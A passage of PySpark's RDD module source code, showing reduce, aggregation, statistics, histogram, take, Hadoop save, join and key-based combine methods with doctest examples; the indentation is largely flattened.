>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
return self.mapPartitions(func).fold(zeroValue, combOp)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = numPartitions
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
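    # Illustrative note (not part of the original source): with 100 input
    # partitions and depth=2, scale = max(ceil(100 ** 0.5), 2) = 10, so the
    # loop above runs once, shrinking 100 -> 10 partitions via reduceByKey
    # before the final reduce(combOp) on the driver.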
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
        e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
        which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
        and 50 we would have a histogram of 1,0,1.
        If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
        this can be switched from an O(log n) insertion to O(1) per
        element (where n = # buckets).
        Buckets must be sorted, must not contain any duplicates, and
        must have at least two elements.
        If `buckets` is a number, it will generate buckets which are
        evenly spaced between the minimum and maximum of the RDD. For
        example, if the min value is 0 and the max is 100, given buckets
        as 2, the resulting buckets will be [0,50) [50,100]. `buckets`
        must be at least 1. If the RDD contains infinity or NaN, an
        exception is thrown. If the elements in the RDD do not vary
        (max == min), a single bucket is always returned.
        It returns a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, (int, long)):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.iteritems():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
        Get the top N elements from an RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
        Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
        It works by first scanning one partition, and using the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self._jrdd.partitions().size()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
                    # the first parameter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p, True)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self._jrdd.partitions().size() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
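        A hypothetical usage sketch (the conf keys shown are illustrative and
        depend on the chosen OutputFormat, so the example is not executed):
        >>> conf = {"mapreduce.job.outputformat.class":
        ...         "org.apache.hadoop.mapreduce.lib.output.TextOutputFormat",
        ...         "mapreduce.output.fileoutputformat.outputdir": "/tmp/out"}  # doctest: +SKIP
        >>> sc.parallelize([(1, "a")]).saveAsNewAPIHadoopDataset(conf)  # doctest: +SKIP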
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
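        A hypothetical usage sketch (the path and Writable class names are
        illustrative only, so the example is not executed):
        >>> rdd = sc.parallelize([(1, "a"), (2, "b")])  # doctest: +SKIP
        >>> rdd.saveAsNewAPIHadoopFile(
        ...     "hdfs:///tmp/out",
        ...     "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
        ...     keyClass="org.apache.hadoop.io.IntWritable",
        ...     valueClass="org.apache.hadoop.io.Text")  # doctest: +SKIP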
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
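        A hypothetical usage sketch (the output path is illustrative only, so
        the example is not executed):
        >>> sc.parallelize([(1, "a"), (2, "b")]).saveAsSequenceFile("/tmp/seq")  # doctest: +SKIP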
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).collect())
[1, 2, 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
def saveAsTextFile(self, path):
"""
Save this RDD as a text file, using string representations of elements.
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, basestring):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda (k, v): k)
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda (k, v): v)
def reduceByKey(self, func, numPartitions=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.iteritems():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
        Perform a full outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> set(sets[0]).intersection(set(sets[1]))
set([])
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in buckets.keys():
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = (size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(batch / 1.5, 1)
c = 0
for split, items in buckets.iteritems():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
partitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = pairRDD.partitionBy(partitioner).values()
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
# This is required so that id(partitionFunc) remains unique,
# even if partitionFunc is a lambda:
rdd._partitionFunc = partitionFunc
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower()
== 'true')
memory = _parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m"))
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeValues(iterator)
return merger.iteritems()
locally_combined = self.mapPartitions(combineLocally)
shuffled = locally_combined.partitionBy(numPartitions)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeCombiners(iterator)
return merger.iteritems()
return shuffled.mapPartitions(_mergeCombiners, True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
        a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
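        A minimal illustrative doctest (this assumes the same running
        SparkContext ``sc`` as the other examples); it builds per-key
        (sum, count) pairs without a groupByKey:
        >>> rdd = sc.parallelize([("a", 1), ("a", 3), ("b", 5)])
        >>> seqOp = (lambda acc, v: (acc[0] + v, acc[1] + 1))
        >>> combOp = (lambda a, b: (a[0] + b[0], a[1] + b[1]))
        >>> sorted(rdd.aggregateByKey((0, 0), seqOp, combOp).collect())
        [('a', (4, 2)), ('b', (5, 1))]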
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions)
def foldByKey(self, zeroValue, func, numPartitions=None):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
        (e.g., 0 for addition, or 1 for multiplication).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> rdd.foldByKey(0, add).collect()
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions)
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
"""
Group the values for each key in the RDD into a single sequence.
        Hash-partitions the resulting RDD into numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
